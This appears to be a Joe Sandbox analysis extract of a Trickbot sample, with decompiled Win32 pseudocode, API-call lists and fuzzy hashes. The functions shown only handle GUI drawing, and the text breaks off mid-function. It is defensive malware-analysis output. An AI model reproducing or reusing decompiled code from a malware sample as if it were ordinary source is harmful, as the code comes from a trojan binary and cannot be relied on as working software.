                          								__edx =  &_v308;
                          								_push( &_v376);
                          								_push( &_v360);
                          								__eax = E00410B10(__esi,  &_v308);
                          								__eflags = _v376;
                          								if(_v376 == 0) {
                          									__eax =  &_v376;
                          									__ecx =  &_v324;
                          									_push( &_v376);
                          									_push( &_v324);
                          									__eax = E00410B10(__esi, "X");
                          								}
                          								_v356.left = _v356.left + 4;
                          								_v360 = _v360 + _v356.left;
                          								__eax = _v360 + _v356.left + 4;
                          								_v356.right = _v360 + _v356.left + 4;
                          								_v376 = _v376 + _v356.top;
                          								__eflags = __ebp & 0x00000020;
                          								_v356.bottom = _v376 + _v356.top;
                          								if((__ebp & 0x00000020) == 0) {
                          									__eax = _v376;
                          									_v340.right = _v340.right - 1;
                          									_v340.bottom = _v340.bottom - 1;
                          									_push(0xf);
                          									asm("cdq");
                          									__eax = _v376 - __edx;
                          									_push(2);
                          									__eax = _v376 - __edx >> 1;
                          									_v340.top = _v340.top + (_v376 - __edx >> 1);
                          									 &_v340 = E00410920(__esi,  &_v340, 2);
                          									 &_v340 = OffsetRect( &_v340, 1, 1);
                          									__ecx =  &_v340;
                          									_push(0xf);
                          									_push(0);
                          									__eax = E00410920(__esi,  &_v340, 0);
                          									__eflags = _v368;
                          									if(_v368 == 0) {
                          										__eax =  *0x44d37c; // 0x0
                          										__eax = SetTextColor(__esi, __eax);
                          									}
                          									__eax =  &_v356;
                          									__ecx = _v372;
                          									__edx =  &_v308;
                          									__eax = DrawTextA(__esi,  &_v308, _v372,  &_v356, 0x20);
                          									goto L45;
                          								} else {
                          									__ebx = _v356.top;
                          									__ebp = _v356.right;
                          									__ecx =  &_v356;
                          									__edx =  &_v324;
                          									__eax =  *__ecx;
                          									__edx->x =  *__ecx;
                          									__eax =  *(__ecx + 0xc);
                          									__ecx = _v340.right;
                          									__esi = ClientToScreen;
                          									__edx->y = _v356.top;
                          									 *(__edx + 8) = _v356.right;
                          									 *(__edx + 0xc) = __eax;
                          									_v324.right.x = _v340.right;
                          									__eax = ClientToScreen(__edi, __edx);
                          									__ecx =  &(_v324.right);
                          									ClientToScreen(__edi,  &(_v324.right)) =  &_v324;
                          									__ecx = _v380;
                          									__esi = ScreenToClient;
                          									__eax = ScreenToClient(_v380,  &_v324);
                          									__ecx =  &(_v324.right);
                          									_v380 = ScreenToClient(_v380,  &(_v324.right));
                          									__ecx =  &_v324;
                          									__edx = _v380;
                          									return InvalidateRect(_v380,  &_v324, 1);
                          								}
                          							}
                          							goto L48;
                          						case 5:
                          							goto L45;
                          					}
                          				}
                          				L48:
                          			}
                          Instruction addresses 0x0041275a to 0x00412c72 (per-instruction listing; the disassembly text itself was not captured in this extract)

                          APIs
                          • GetWindowLongA.USER32(?,000000F0), ref: 00412764
                          • GetParent.USER32(?), ref: 0041277D
                          • SetBkMode.GDI32(?,00000002), ref: 0041278D
                          • GetClientRect.USER32(?,?), ref: 0041279F
                          • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004127C7
                          • SelectObject.GDI32(?,00000000), ref: 004127D7
                            • Part of subcall function 00412410: InflateRect.USER32(?,000000FF,000000FF), ref: 00412452
                            • Part of subcall function 00412410: IsWindowEnabled.USER32(?), ref: 00412465
                            • Part of subcall function 00412410: InflateRect.USER32(?,000000FF,000000FF), ref: 0041248C
                            • Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124A3
                            • Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124BC
                            • Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124D4
                            • Part of subcall function 00412410: PatBlt.GDI32(?,?,?,00000001,00000001,00F00021), ref: 004124EE
                            • Part of subcall function 00412410: SelectObject.GDI32(?,00000000), ref: 00412513
                          • GetSysColor.USER32(0000000F), ref: 004127E9
                          • SetBkColor.GDI32(?,00000000), ref: 004127ED
                          • GetSysColor.USER32(00000012), ref: 004127F5
                          • SetTextColor.GDI32(?,00000000), ref: 004127F9
                          • SendMessageA.USER32(?,00000135,?,?), ref: 0041280B
                          • SelectObject.GDI32(?,00000000), ref: 00412813
                          • IntersectClipRect.GDI32(?,?,?,?,?), ref: 00412838
                          • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 00412870
                          • IsWindowEnabled.USER32(?), ref: 00412877
                          • SendMessageA.USER32(?,000000F2,00000000,00000000), ref: 0041288B
                          • GetWindowTextA.USER32(?,?,00000100), ref: 004128F9
                          • SelectObject.GDI32(?,?), ref: 00412C4F
                          • SelectObject.GDI32(?,00000000), ref: 00412C62
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ObjectSelect$ColorRectWindow$MessageSend$EnabledInflateText$ClientClipIntersectLongModeParent
                          • String ID:
                          • API String ID: 2549663215-0
                          • Opcode ID: 718ee20f1eeb07b6238abff5fbbfc3cedeaab639b5d4cf105f316051965d9950
                          • Instruction ID: 6fb1c0adf1523fd54b19ce34ffb638e9eb1c6206c7450915b27b67162b3d1e0f
                          • Opcode Fuzzy Hash: 718ee20f1eeb07b6238abff5fbbfc3cedeaab639b5d4cf105f316051965d9950
                          • Instruction Fuzzy Hash: 83F14AB1108301AFD704DF64CD89EAFB7E8FB89704F00592DF68186251E7B5E945CB5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E00412F80(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                          				char _v16;
                          				struct tagRECT _v32;
                          				struct tagPOINT _v40;
                          				struct tagPOINT _v48;
                          				long _v52;
                          				long _v56;
                          				void* _v60;
                          				struct HWND__* _v64;
                          				signed int _v68;
                          				long _t73;
                          				signed int _t82;
                          				signed int _t84;
                          				int _t103;
                          				signed int _t118;
                          				struct HDC__* _t135;
                          				struct HWND__* _t144;
                          				struct HWND__* _t145;
                          				signed short _t146;
                          				long _t148;
                          				long _t150;
                          				signed int* _t153;
                          				signed int* _t154;
                          
                          				_t153 =  &_v68;
                          				_t145 = _a4;
                          				_t73 = GetWindowLongA(_t145, 0xfffffff0);
                          				_v68 = _t73;
                          				if((_t73 & 0x10000000) == 0) {
                          					L33:
                          					return _t73;
                          				} else {
                          					if(_a12 != 3 || (_t73 & 0x00000003) != 3) {
                          						L4:
                          						if(_a8 != 0) {
                          							HideCaret(_t145);
                          						}
                          						GetWindowRect(_t145,  &_v48);
                          						_t144 = GetParent(_t145);
                          						ScreenToClient(_t144,  &_v48);
                          						_t146 = 0xf;
                          						ScreenToClient(_t144,  &_v40);
                          						_t135 = GetDC(_t144);
                          						_t82 = _v68 & 0x00100000;
                          						_v56 = _t82;
                          						if(_t82 != 0) {
                          							_t146 = 7;
                          						}
                          						_t84 = _v68 & 0x00200000;
                          						_v52 = _t84;
                          						if(_t84 != 0) {
                          							_t146 = _t146 & 0x0000fffb;
                          						}
                          						if(_a8 - GetWindowLongA(_t145, 0xfffffff4) != 0xfffffc18) {
                          							L24:
                          							E00410A60(_t175, _t135,  &_v48, _t146);
                          							_t154 =  &(_t153[3]);
                          							if(_a12 != 3 || (_v68 & 0x00000003) != 3) {
                          								__eflags = _v52;
                          								if(_v52 != 0) {
                          									_push(4);
                          									_v40.x = _v40.x + 1;
                          									_push(0);
                          									E00410920(_t135,  &_v48, 0);
                          									_v40.x = _v40.x - 1;
                          									_v16 = _v48.x;
                          									_t150 = _v40.x - GetSystemMetrics(2);
                          									__eflags = _t150;
                          									_push(8);
                          									_push(7);
                          									_v48.x = _t150;
                          									E00410920(_t135,  &_v48, 7);
                          									_v48.x = _v16;
                          									_t154 =  &(_t154[0xa]);
                          								}
                          								__eflags = _v56;
                          								if(_v56 != 0) {
                          									_push(8);
                          									_v40.y = _v40.y + 1;
                          									_push(0);
                          									E00410920(_t135,  &_v48, 0);
                          									_v40.y = _v40.y - 1;
                          									_t148 = _v40.y - GetSystemMetrics(0x15);
                          									__eflags = _t148;
                          									_push(4);
                          									_push(7);
                          									_v48.y = _t148;
                          									E00410920(_t135,  &_v48, 7);
                          								}
                          							} else {
                          								_t103 = GetSystemMetrics(2);
                          								_push(0xc);
                          								_push(7);
                          								_v48.x = _v40.x - _t103;
                          								E00410920(_t135,  &_v48, 7);
                          								E004123A0(_t145);
                          							}
                          							_t73 = ReleaseDC(_t144, _t135);
                          							if(_a8 != 0) {
                          								return ShowCaret(_t145);
                          							}
                          							goto L33;
                          						} else {
                          							_v60 = 0x29a;
                          							_v32.left = SendMessageA(_t144, 0x1944, 0,  &_v60);
                          							if(_v60 == 0x29a) {
                          								_v32.left = SendMessageA(_t144, 0x1943, 0,  &_v60);
                          							}
                          							GetClassNameA(_t144,  &_v16, 0x10);
                          							if(lstrcmpA( &_v16, "ComboBox") == 0 || _v60 == 1 && _v32.left == 0x3eb) {
                          								_v64 = GetParent(_t144);
                          								MapWindowPoints(_t144, _v64,  &_v48, 2);
                          								ReleaseDC(_t144, _t135);
                          								_t135 = GetDC(_v64);
                          								if(_a8 == 0) {
                          									_t146 = _t146 & 0x0000fffd;
                          									_t41 =  &(_v48.y);
                          									 *_t41 = _v48.y + 1;
                          									__eflags =  *_t41;
                          									goto L23;
                          								} else {
                          									_t118 = GetWindowLongA(_t144, 0xfffffff0) & 0x00000003;
                          									if(_t118 == 2) {
                          										L20:
                          										__eflags = SendMessageA(_t144, 0x157, 0, 0);
                          										if(__eflags == 0) {
                          											goto L23;
                          										} else {
                          											ReleaseDC(_v64, _t135);
                          											return ShowCaret(_t145);
                          										}
                          									} else {
                          										_t175 = _t118 - 3;
                          										if(_t118 == 3) {
                          											goto L20;
                          										} else {
                          											_t146 = _t146 & 0x0000fff7;
                          											GetWindowRect(GetWindow(_t144, 5),  &_v32);
                          											_v40.x = _v40.x + _v32.left - _v32.right;
                          											E00410A60(_t175, _t135,  &_v48, 0x1008);
                          											_v40.x = _v40.x + _v32.right - _v32.left;
                          											_t153 =  &(_t153[3]);
                          											L23:
                          											_t144 = _v64;
                          											goto L24;
                          										}
                          									}
                          								}
                          							} else {
                          								goto L24;
                          							}
                          						}
                          					} else {
                          						_t73 = SendMessageA(_t145, 0x157, 0, 0);
                          						if(_t73 != 0) {
                          							goto L33;
                          						} else {
                          							goto L4;
                          						}
                          					}
                          				}
                          			}


                          Addresses of the decompiled lines above (address column, one entry per line, in order): 0x00412f80, 0x00412f85, 0x00412f8e, 0x00412f94, 0x00412f9d, 0x004132b5, 0x004132b5, 0x00412fa3, 0x00412fa8, 0x00412fc8, 0x00412fcd, 0x00412fd0, 0x00412fd0, 0x00412fdc, 0x00412fe9, 0x00412ff7, 0x00412ffd, 0x00413003, 0x0041300c, 0x00413012, 0x00413017, 0x0041301b, 0x0041301d, 0x0041301d, 0x00413025, 0x0041302a, 0x0041302e, 0x00413030, 0x00413030, 0x0041304a, 0x004131a2, 0x004131a9, 0x004131ae, 0x004131b6, 0x004131f6, 0x004131fb, 0x00413201, 0x00413203, 0x00413207, 0x0041320d, 0x00413216, 0x0041321e, 0x0041322d, 0x0041322d, 0x0041322f, 0x00413235, 0x00413237, 0x0041323f, 0x00413248, 0x0041324c, 0x0041324c, 0x0041324f, 0x00413254, 0x0041325a, 0x0041325c, 0x00413260, 0x00413266, 0x0041326b, 0x0041327e, 0x0041327e, 0x00413280, 0x00413286, 0x00413288, 0x00413290, 0x00413295, 0x004131c2, 0x004131c8, 0x004131d0, 0x004131d6, 0x004131d8, 0x004131e0, 0x004131e9, 0x004131ee, 0x0041329a, 0x004132a5, 0x00000000, 0x004132a8, 0x00000000, 0x00413050, 0x00413050, 0x00413073, 0x00413077, 0x0041308c, 0x0041308c, 0x00413098, 0x004130b0, 0x004130d2, 0x004130e3, 0x004130eb, 0x00413101, 0x00413103, 0x00413195, 0x0041319a, 0x0041319a, 0x0041319a, 0x00000000, 0x00413109, 0x00413112, 0x00413118, 0x00413166, 0x00413176, 0x00413178, 0x00000000, 0x0041317a, 0x00413180, 0x00413194, 0x00413194, 0x0041311a, 0x0041311a, 0x0041311d, 0x00000000, 0x0041311f, 0x0041311f, 0x00413133, 0x0041314a, 0x00413150, 0x0041315d, 0x00413161, 0x0041319e, 0x0041319e, 0x00000000, 0x0041319e, 0x0041311d, 0x00413118, 0x00000000, 0x00000000, 0x00000000, 0x004130b0, 0x00412fb0, 0x00412fba, 0x00412fc2, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00412fc2, 0x00412fa8

                          APIs
                          • GetWindowLongA.USER32(?,000000F0), ref: 00412F8E
                          • SendMessageA.USER32(?,00000157,00000000,00000000), ref: 00412FBA
                          • HideCaret.USER32(?), ref: 00412FD0
                          • GetWindowRect.USER32(?,?), ref: 00412FDC
                          • GetParent.USER32(?), ref: 00412FE3
                          • ScreenToClient.USER32(00000000,?), ref: 00412FF7
                          • ScreenToClient.USER32(00000000,?), ref: 00413003
                          • GetDC.USER32(00000000), ref: 00413006
                          • GetWindowLongA.USER32(?,000000F4), ref: 00413038
                          • SendMessageA.USER32(00000000,00001944,00000000,0000029A), ref: 00413065
                          • SendMessageA.USER32(00000000,00001943,00000000,0000029A), ref: 00413086
                          • GetClassNameA.USER32(00000000,?,00000010), ref: 00413098
                          • lstrcmpA.KERNEL32(?,ComboBox), ref: 004130A8
                          • GetParent.USER32(00000000), ref: 004130CC
                          • MapWindowPoints.USER32(00000000,0000029A,?,00000002), ref: 004130E3
                          • ReleaseDC.USER32(00000000,00000000), ref: 004130EB
                          • GetDC.USER32(?), ref: 004130F6
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0041310C
                          • GetWindow.USER32(00000000,00000005), ref: 00413127
                          • GetWindowRect.USER32(00000000,?), ref: 00413133
                          • SendMessageA.USER32(00000000,00000157,00000000,00000000), ref: 00413170
                          • ReleaseDC.USER32(?,00000000), ref: 00413180
                          • ShowCaret.USER32(?), ref: 00413187
                          • GetSystemMetrics.USER32(00000002), ref: 004131C8
                          • GetSystemMetrics.USER32(00000002), ref: 00413227
                          • GetSystemMetrics.USER32(00000015), ref: 00413278
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041329A
                          • ShowCaret.USER32(?), ref: 004132A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$MessageSend$CaretLongMetricsReleaseSystem$ClientParentRectScreenShow$ClassHideNamePointslstrcmp
                          • String ID: ComboBox
                          • API String ID: 930961256-1152790111
                          • Opcode ID: fe2a462073d120821d31dd0948e35ce772643209e17782300ff845c6992b2f7d
                          • Instruction ID: b5fbc689b6cbcbbb6b2e5f5079c95918f31826f35d66183bcdc2b222bf09efc0
                          • Opcode Fuzzy Hash: fe2a462073d120821d31dd0948e35ce772643209e17782300ff845c6992b2f7d
                          • Instruction Fuzzy Hash: 6B91CE71508301BFD7109F64DC49FAFB7E8EB84709F00192EF68196291D7B8DA85CB6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00411690() {
                          				struct _WNDCLASSA _v56;
                          				signed int _t8;
                          				signed int _t9;
                          				int _t10;
                          				struct HINSTANCE__* _t13;
                          				short _t14;
                          				short _t15;
                          				short _t17;
                          				short _t20;
                          				short _t22;
                          				struct HDC__* _t33;
                          				intOrPtr* _t34;
                          				intOrPtr* _t44;
                          
                          				EnterCriticalSection(0x44d320);
                          				_t33 = GetDC(0);
                          				_t8 = GetDeviceCaps(_t33, 0xc);
                          				_t9 = GetDeviceCaps(_t33, 0xe);
                          				_t10 = 1;
                          				if(_t8 * _t9 < 4) {
                          					_t10 = 0;
                          				}
                          				 *0x44d340 = _t10;
                          				if(GetSystemMetrics(1) == 0x15e && GetSystemMetrics(0) == 0x280) {
                          					 *0x44d340 = 0;
                          				}
                          				ReleaseDC(0, _t33);
                          				if( *0x44d340 == 0) {
                          					L8:
                          					LeaveCriticalSection(0x44d320);
                          					_t13 =  *0x44d340; // 0x0
                          					return _t13;
                          				} else {
                          					_t14 = GlobalAddAtomA("C3d");
                          					 *0x44d348 = _t14;
                          					if(_t14 != 0) {
                          						_t15 = GlobalAddAtomA("C3dNew");
                          						 *0x44d34e = _t15;
                          						if(_t15 == 0) {
                          							goto L7;
                          						} else {
                          							 *0x44d34c = GlobalAddAtomA("C3dL");
                          							_t17 = GlobalAddAtomA("C3dH");
                          							 *0x44d34a = _t17;
                          							if( *0x44d34c == 0 || _t17 == 0) {
                          								 *0x44d340 = 0;
                          								return 0;
                          							} else {
                          								 *0x44d352 = GlobalAddAtomA("C3dLNew");
                          								_t20 = GlobalAddAtomA("C3dHNew");
                          								 *0x44d350 = _t20;
                          								if( *0x44d352 == 0 || _t20 == 0) {
                          									 *0x44d340 = 0;
                          									return 0;
                          								} else {
                          									_t22 = GlobalAddAtomA("C3dD");
                          									 *0x44d354 = _t22;
                          									if(_t22 == 0) {
                          										goto L7;
                          									} else {
                          										 *0x44de45 = GetSystemMetrics(0x2a);
                          										E004115F0();
                          										if(E00411960(1) == 0) {
                          											goto L7;
                          										} else {
                          											_t34 = 0x44dda0;
                          											_t44 = 0x43edc4;
                          											do {
                          												_t1 = _t44 - 0x14; // 0x43edb0
                          												 *_t34 =  *_t44;
                          												_t34 = _t34 + 0x18;
                          												_t44 = _t44 + 0x20;
                          												GetClassInfoA(0, _t1,  &_v56);
                          												 *((intOrPtr*)(_t34 - 0x14)) = _v56.lpfnWndProc;
                          											} while (_t44 < 0x43ee84);
                          											if(GetClassInfoA(0, 0x8002,  &_v56) == 0) {
                          												 *0x44de30 = DefDlgProcA;
                          											} else {
                          												 *0x44de30 = _v56.lpfnWndProc;
                          											}
                          										}
                          									}
                          									goto L8;
                          								}
                          							}
                          						}
                          					} else {
                          						L7:
                          						 *0x44d340 = 0;
                          						goto L8;
                          					}
                          				}
                          			}


                          Addresses of the decompiled lines above (address column, one entry per line, in order): 0x0041169b, 0x004116a9, 0x004116b4, 0x004116bb, 0x004116c0, 0x004116c8, 0x004116ca, 0x004116ca, 0x004116d4, 0x004116e0, 0x004116ed, 0x004116ed, 0x004116fa, 0x00411707, 0x0041172b, 0x00411730, 0x00411736, 0x00411741, 0x00411709, 0x00411714, 0x00411716, 0x0041171f, 0x00411747, 0x00411749, 0x00411752, 0x00000000, 0x00411754, 0x0041175b, 0x00411766, 0x00411770, 0x00411776, 0x00411867, 0x00411876, 0x00411785, 0x0041178c, 0x00411797, 0x004117a1, 0x004117a7, 0x00411854, 0x00411863, 0x004117b6, 0x004117bb, 0x004117bd, 0x004117c6, 0x00000000, 0x004117cc, 0x004117d0, 0x004117d5, 0x004117e6, 0x00000000, 0x004117ec, 0x004117ec, 0x004117f1, 0x004117fc, 0x004117fe, 0x00411801, 0x00411808, 0x0041180c, 0x00411811, 0x0041181d, 0x0041181d, 0x00411832, 0x00411847, 0x00411834, 0x00411838, 0x00411838, 0x00411832, 0x004117e6, 0x00000000, 0x004117c6, 0x004117a7, 0x00411776, 0x00411721, 0x00411721, 0x00411721, 0x00000000, 0x00411721, 0x0041171f

                          APIs
                          • EnterCriticalSection.KERNEL32(0044D320,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 0041169B
                          • GetDC.USER32(00000000), ref: 004116A3
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004116B4
                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 004116BB
                          • GetSystemMetrics.USER32(00000001), ref: 004116D9
                          • GetSystemMetrics.USER32(00000000), ref: 004116E4
                          • ReleaseDC.USER32(00000000,00000000), ref: 004116FA
                          • GlobalAddAtomA.KERNEL32(C3d), ref: 00411714
                          • LeaveCriticalSection.KERNEL32(0044D320,?,?,?,?,?,?,?,?,?,?,?,?,00410C07), ref: 00411730
                          • GlobalAddAtomA.KERNEL32(C3dNew), ref: 00411747
                          • GlobalAddAtomA.KERNEL32(C3dL), ref: 00411759
                          • GlobalAddAtomA.KERNEL32(C3dH), ref: 00411766
                          • GlobalAddAtomA.KERNEL32(C3dLNew), ref: 0041178A
                          • GlobalAddAtomA.KERNEL32(C3dHNew), ref: 00411797
                          • GlobalAddAtomA.KERNEL32(C3dD), ref: 004117BB
                          • GetSystemMetrics.USER32(0000002A), ref: 004117CE
                          • GetClassInfoA.USER32(00000000,0043EDB0,?), ref: 00411811
                          • GetClassInfoA.USER32(00000000,00008002,?), ref: 0041182E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AtomGlobal$MetricsSystem$CapsClassCriticalDeviceInfoSection$EnterLeaveRelease
                          • String ID: C3d$C3dD$C3dH$C3dHNew$C3dL$C3dLNew$C3dNew
                          • API String ID: 1233821986-3277416593
                          • Opcode ID: 936facdebb5b3183a78c24582e98603c3e87f0bab6ca2ab8b0ff706ea7038536
                          • Instruction ID: 2ea084c32dfb33befc72acde89e1a674d5dc18157d6bc8c5c63fc4487b2fbb62
                          • Opcode Fuzzy Hash: 936facdebb5b3183a78c24582e98603c3e87f0bab6ca2ab8b0ff706ea7038536
                          • Instruction Fuzzy Hash: A1417179B40240ABE710AFA9EC46BA677A4BB85750F140437ED00973E1DBFC5885CB6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0042FBCD(intOrPtr __ecx) {
                          				int _t231;
                          				void* _t239;
                          				int _t240;
                          				void* _t260;
                          				void* _t267;
                          				void* _t268;
                          				CHAR* _t280;
                          				signed int _t336;
                          				int _t392;
                          				CHAR* _t407;
                          				signed int _t408;
                          				signed int _t409;
                          				int _t420;
                          				struct tagSIZE* _t421;
                          				int _t428;
                          				signed int _t437;
                          				int _t442;
                          				signed int _t446;
                          				void* _t447;
                          				int _t453;
                          				void* _t456;
                          				intOrPtr _t461;
                          
                          				E00405340(E004387B0, _t456);
                          				_t461 =  *0x44b35c; // 0x1
                          				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
                          				if(_t461 == 0) {
                          					_push(__ecx);
                          					E004215AA(_t456 - 0x44, __eflags);
                          					 *(_t456 - 4) = 0;
                          					 *(_t456 - 0x30) = E0041B66F(__ecx);
                          					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
                          					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
                          					 *((intOrPtr*)(_t456 - 0x48)) = 0;
                          					 *((intOrPtr*)(_t456 - 0x4c)) = 0x43bd94;
                          					 *(_t456 - 4) = 1;
                          					E0042179E(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
                          					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
                          					 *((intOrPtr*)(_t456 - 0x60)) = 0x43bd94;
                          					 *(_t456 - 4) = 2;
                          					asm("sbb eax, eax");
                          					E0042179E(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
                          					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
                          					 *(_t456 - 0x58) = 0x43bd94;
                          					 *(_t456 - 4) = 3;
                          					asm("sbb eax, eax");
                          					E0042179E(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
                          					 *(_t456 - 0x10) = GetSystemMetrics(6);
                          					 *(_t456 - 0x14) = GetSystemMetrics(5);
                          					_t428 = GetSystemMetrics(0x21);
                          					_t231 = GetSystemMetrics(0x20);
                          					__eflags =  *(_t456 - 0x30) & 0x00040600;
                          					_t442 = _t231;
                          					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
                          						E0042FB10(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
                          						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
                          						E0042FB10(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
                          						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
                          						 *(_t456 - 0x74) = _t407;
                          						_t408 =  *(_t456 - 0x14);
                          						 *(_t456 - 0x18) = _t428 - _t407;
                          						_t336 = _t442 - _t408 + _t408;
                          						__eflags =  *(_t456 - 0x2f) & 0x00000002;
                          						 *(_t456 - 0x2c) = _t336;
                          						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
                          							_t409 =  *(_t456 - 0x18);
                          						} else {
                          							_t436 = _t428 -  *(_t456 - 0x74) +  *0x44b72c;
                          							_t455 = _t442 - _t408 + _t408 * 2 +  *0x44b728;
                          							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x44b72c, _t336, 1, 0);
                          							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x44b72c,  *(_t456 - 0x2c), 1, 0);
                          							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x44b72c,  *(_t456 - 0x2c), 1, 0);
                          							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
                          							_t437 =  *(_t456 - 0x18);
                          							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x44b728,  *(_t456 - 0x24), 1, _t437, 0);
                          							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x44b728,  *(_t456 - 0x24), 1, _t437, 0);
                          							E0042CAE1(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x44b728,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
                          							E0042CAE1(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
                          							_t336 =  *(_t456 - 0x2c);
                          							_t409 = _t437;
                          						}
                          						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
                          					}
                          					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
                          					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
                          						E0042FB10(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
                          						goto L25;
                          					} else {
                          						asm("movsd");
                          						asm("movsd");
                          						_t240 =  *0x44b72c; // 0x0
                          						asm("movsd");
                          						asm("movsd");
                          						_t446 =  *(_t456 - 0x10);
                          						 *(_t456 - 0x64) = _t240 + _t446 +  *(_t456 - 0x24);
                          						E0042FB10(_t456 - 0x44, _t456 - 0x70,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
                          						InflateRect(_t456 - 0x70,  ~( *(_t456 - 0x14)),  ~_t446);
                          						asm("sbb eax, eax");
                          						FillRect( *(_t456 - 0x40), _t456 - 0x70,  ~(_t456 - 0x58) &  *(_t456 - 0x54));
                          						E0042FB10(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14), _t446, _t456 - 0x4c);
                          						_t260 =  *0x44b730; // 0x0
                          						__eflags = _t260;
                          						if(_t260 != 0) {
                          							 *(_t456 - 0x18) = SelectObject( *(_t456 - 0x40), _t260);
                          							_t280 =  *0x447478; // 0x44748c
                          							 *(_t456 - 0x10) = _t280;
                          							 *(_t456 - 4) = 4;
                          							E004191FC( *((intOrPtr*)(_t456 - 0x50)), _t456 - 0x10);
                          							_t421 = _t456 - 0x78;
                          							asm("sbb esi, esi");
                          							_t453 = ( ~( *(_t456 - 0x30) & 0x00080000) &  *0x44b728) +  *(_t456 - 0x70);
                          							GetTextExtentPoint32A( *(_t456 - 0x3c),  *(_t456 - 0x10),  *( *(_t456 - 0x10) - 8), _t421);
